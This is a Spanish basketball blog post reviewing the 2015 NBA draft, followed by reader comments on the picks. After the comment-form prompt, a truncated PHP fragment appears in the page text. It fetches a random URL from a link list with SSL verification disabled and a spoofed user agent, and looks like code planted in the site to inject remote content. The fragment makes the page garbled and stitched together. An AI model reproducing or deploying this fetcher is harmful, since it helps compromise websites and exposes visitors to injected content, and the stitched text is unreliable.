Draft 2015: Karl Anthony-Towns es el número 1

26 de June de 2015 por txusma

Los Kings iban a traspasar a Cousins, los Celtics se iban a volver locos si Jahlil Okafor caía hasta la 3ª elección de los Sixers, todos los jugadores de los Nuggets estaban en el disparadero… Al final prácticamente no hubo movimientos, de hecho el primero no llegó hasta que los Hawks traspasaron su 15ª elección a los Wizards a cambio de la 19 y un par de 2ª rondas y eso fue ya sobre las 3:20 de la mañana…

De todas maneras las elecciones en los puestos de lotería estuvieron de lo más entretenidas. El número 1 de Karl-Anthony Towns estaba cantado desde hace semanas pero la fiesta empezaba con la elección de D’Angelo Russell por parte de los Lakers. Los angelinos han visto en Russell la promesa de un base dominante y ante la mayor facilidad para conseguir jugadores interiores en el mercado de agentes libres se lanzaron a por el ex jugador de Ohio State. Seguramente esta elección dejó con cara de tontos a los Sixers que apenas 2 días atrás estaban estampando sus nuevas camisetas con el nombre de Russell a la espalda y ahora veían como los Lakers se les adelantaban. El premio de consolación no era baladí, nada menos que Jahlil Okafor. En las horas previas se había hablado de que de llegar Okafor, los Celtics darían el oro y el moro (y a Marcus Smart y tropecientas rondas) por hacerse con sus servicios. Al final, nada de nada. A día de hoy, Okafor continúa siendo jugador de los Sixers.

Con la 4ª elección siguieron las sorpresas: Kristaps Porzingis a los Knicks, cuyos aficionados recibieron con abucheos. Estoy casi seguro que en unos meses han cambiado de parecer. Y cuando todos esperaban que Adam Silver pronunciara el nombre de Winlow o Cauley-Stein para los Magic, la franquicia de Florida se descolgó con la elección de Mario Hezonja. El muchas veces ninguneado por Xavi Pascual, acababa de ser escogido en el número 5 del draft de la NBA nada menos. Lástima que no estuviera en la Draft Room porque el Barça había programado entrenamiento y una comida para hoy mismo y claro, como se lo va a perder…

Para la sexta elección, Emmanuel Mudiay parecía obvio aunque también sonaba Willie Cauley-Stein. Al final el elegido fue este último a pesar de que los mocks de ultimísima hora le habían pronosticado una buena caída. El ex jugador del Guandong fue elegido por los Nuggets en la séptima elección. Le tocaba a los Pistons, locos por draftear a un alero, y Justise Winslow seguía libre. Parecía blanco y en botella pero no. Stan Van Gundy se decantó por el alero con el que se les relacionaba en los últimos días, Stanley Johnson, de Arizona. En la novena estaba cantado el nombre del pívot Frank Kaminsky tras los últimos movimientos de Charlotte y los rumores que iban surgiendo así que Justise Winslow, ese jugador que nos maravilló a todos en la March Madness, detuvo su caída en la décima elección de los Miami Heat. Premio gordo para Pat Riley.

A estas alturas ya eran prácticamente las 3 de la mañana y los ánimos en el chat empezaban a decaer pero aún pudimos comentar la elección de Myles Turner por los Pacers (¿bye, bye, Hibbert?) y la de Trey Lyles por los Jazz, otro jugador interior pero de un perfil diferente al de Favors y Gobert. Una pieza que faltaba en Salt Lake City.

Los campeones que se quedaron despiertos pasaron de puntillas por la elección de Devin Booker por los Suns (ni la comentaron de hecho) y por la de Cameron Payne por los Thunder pero disfrutaron de los primeros trades de la noche: Greivis Vasquez a los Bucks por una 1ª del 2017 protegida y una 2ª ronda y la número 15 de los Hawks por la 19 de los Wizards y un par de 2ª rondas. Con esa número 15 los Wizards pillaron a Kelly Oubre y la 19 fue de nuevo empaquetada por los Hawks a cambio de Tim Hardaway Jr., de los Knicks. Con esa 19, la franquicia de la Gran Manzana eligió a su base: Jerian Grant, en el que servidor tiene puestas bastantes esperanzas.

Antes de esa elección 19, los Celtics escogieron a Terry Rozier en la 16 (y eso que sonaba para últimos puestos de la 1ª ronda), los Bucks también sorprendieron con la elección de Rashad Vaughn aunque los expertos dicen que hay que vigilar muy de cerca a este chaval y los Rockets draftearon a Sam Dekker a pesar de que el base Tyus Jones, al que muchos les asignaban, seguía libre. El puesto de Vasquez en los Raptors fue cubierto en la elección 20 por Delon Wright, un jugador al que  cualquier análisis estadístico augura un buen futuro.

Bobby Portis acabó cayendo hasta la elección 22 de los Bulls y Rondae Hollis-Jefferson fue drafteado a continuación por los Nets que habían enviado a Mason Plumlee y su elección 43 a Portland para conseguir el derecho a escoger en esa 23ª elección.

Y poco más dio de sí el draft. Podemos apuntar alguna sorpresa más, como la elección de Larry Nance por los Lakers en primera ronda cuando hace una semana casi ni salía en los mocks, la caída de RJ Hunter hasta la 29 y la elección de Kevon Looney (que llegó a ser TOP-5 en algún momento del año) por los Warriors en la 30. De los jugadores que nos caen más cerca, Guillermo Hernangomez fue escogido en la posición 35, Daniel Diez en la 54 de Portland y el argentino Juan Vauler en la 39. Marcus Eriksson apareció por sorpresa en la elección 50 de los Hawks cuando nadie contaba con él y Nikola Radicevic, también del Sevilla, fue escogido en las últimas posiciones.

Acabó definitivamente una de las noches más entretenidas del año, que además en esta ocasión hemos podido comentar en directo. Sin duda, repetiremos la experiencia el año que viene.

Comenta

9 comentarios a esta entrada

  1. Vader dice:
    #1

    Al final los Knicks han traspasado alguna segunda ronda por Hernangomez, pero dicen que se quedará un año más en España.

      Citar

  2. Triceratops dice:
    #2

    Hablar de ganadores y perdedores en la noche del Draft es una idiotez pues realmente son melones sin abrir, pero bueno, me la juego.

    Ganadores: Lakers (Rusell), Heat (Winslow), Thunder (Payne), Wizards (Oubre) , Bulls (Portis)
    Perdedores: Knicks (Porzingis), Hornets (Kaminsky) Pacers (Turner)

      Citar

  3. Ruxixón dice:
    #3

    Deberían cerrar el Marca….los Kñicks,la madre que los parió.

    Pues si,estuvo entretenida la noche aunque en día de draft,cuando el río suena…no pasa nada.Todos los años se cumple la premisa de muchísimos rumores y al final no se concreta ningún gran movimiento.

    La elección de Grant mola,es un tío con carácter,que se echó a Notre Dame a las espaldas esta temporada.Recordemos que casi se cargan a Kentucky en el Elite 8.Y bueno también en el apartado defensivo.Le viene muy bien que sea senior,no es fácil jugar en los Knicks y tener ese punto más de madurez es muy positivo.

    Es increíble pero me he quedado un poco flop con la elección de los 76ers.Han elegido bien,tenían que escoger a Okafor está claro,pero me había hecho ilusiones con Russell dándole un poco más de forma al proyecto de la franquicia.En este punto parece que no se avanza y encima se abre aún más la incógnita del estado físico de Embiid.

    Y luego por la parte que me toca,redundo en lo de me toca (los…) el traspaso de Cleveland,quitándose a Tyus Jones de encima cuando es un organizador del copón,y encima me parece complementario con Dellavedova,uno más como perro de presa y otro fino estilista.Se van a arrepentir.

      Citar

  4. Vader dice:
    #4

    Yo no me atrevo ha hacer pronosticos de ganadores y perdedores. Como decís son melones sin abrir y en algún caso hasta que pasen unos años no podremos sacar conclusiones claras.

    Pero una cosa si que quiero decir, depende de como salgan Russell y Okafor esta elección se Lakers, para bien o para mal, puede ser muy recordada. Y por supuesto lo mismo para Wolves…

    Y mis Knicks, como dije ayer, su suerte correrá en la AL. Pero en mi opinión se movieron bien, cubrieron el puesto de PG que tanta falta le hacía al equipo desde hace muuuchos años y veremos el melón Porzingis como sale. Si consiguen subirlo de peso año a año dentro de 2 o 3 puede ser una bomba de jugador. El tema es ese, Phil ha pillado el mayor talento que quedaba en el draft. Con el leton no ha ido a tapar un hueco para que rinda desde ya. Cosa que si ha hecho con Grant,njugador senior que será PG titular.

    Ahora suena D.West, veremos. Y tmb veremos si Monroe es la apuesta, donde acaba Aldrigde, etc…

    Saludos!!

      Citar

  5. Triceratops dice:
    #5

    Vader:
    Yo no me atrevo ha hacer pronosticos de ganadores y perdedores. Como decís son melones sin abrir y en algún caso hasta que pasen unos años no podremos sacar conclusiones claras.

    Está claro Vader, pero es para darle vidilla a esto, y luego dentro un tiempo nos tiremos los trastos a la cabeza unos a otros por decir y blasfemar de un jugón que nosotros deciamos que era un paquete y viceversa.
    Mojarse…hombres..!

      Citar

  6. Vader dice:
    #6

    Triceratops: Está claro Vader, pero es para darle vidilla a esto, y luego dentro un tiempo nos tiremos los trastos a la cabeza unos a otros por decir y blasfemarde un jugón que nosotros deciamos que era un paquete y viceversa.
    Mojarse…hombres..!

    Jajaja tienes razón, perdona!!!

    Venga me tiro a la piscina: ROY para Okafor y Russell decepción XD

      Citar

  7. Jose Luis dice:
    #7

    Vader:
    Yo no me atrevo ha hacer pronosticos de ganadores y perdedores. Como decís son melones sin abrir y en algún caso hasta que pasen unos años no podremos sacar conclusiones claras.

    Pero una cosa si que quiero decir, depende de como salgan Russell y Okafor esta elección se Lakers, para bien o para mal, puede ser muy recordada. Y por supuesto lo mismo para Wolves…

    Y mis Knicks, como dije ayer, su suerte correrá en la AL. Pero en mi opinión se movieron bien, cubrieron el puesto de PG que tanta falta le hacía al equipo desde hace muuuchos años y veremos el melón Porzingis como sale. Si consiguen subirlo de peso año a año dentro de 2 o 3 puede ser una bomba de jugador. El tema es ese, Phil ha pillado el mayor talento que quedaba en el draft. Con el leton no ha ido a tapar un hueco para que rinda desde ya. Cosa que si ha hecho con Grant,njugador senior que será PG titular.

    Ahora suena D.West, veremos. Y tmb veremos si Monroe es la apuesta, donde acaba Aldrigde, etc…

    Saludos!!

    Para Wolves lo dudo, prácticamente todo el mundo daba unánime a Towns… si luego sale bluff, es “mala suerte”, no es que se la hayan jugado vamos

    Se puede recordar como cagada Russell o Porzingis, o hasta Hezonja… pero Towns no

      Citar

  8. Triceratops dice:
    #8

    Jose Luis: Para Wolves lo dudo, prácticamente todo el mundo daba unánime a Towns… si luego sale bluff, es “mala suerte”, no es que se la hayan jugado vamos

    Se puede recordar como cagada Russell o Porzingis, o hasta Hezonja… pero Towns no

    Agree, lo de Towns era lo esperado.
    Cagada es lo de Anthony Bennet, pero lo de Greg Oden yo no lo considero cagada, por ejemplo.

      Citar

  9. Jose Luis dice:
    #9

    Bueno lo de Oden quizá pueda ser, creo que no estaba tan claro que era el mejor, pero teniendo a Brandon Roy prefirieron a Oden

    Yo tampoco lo considero cagada vaya

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>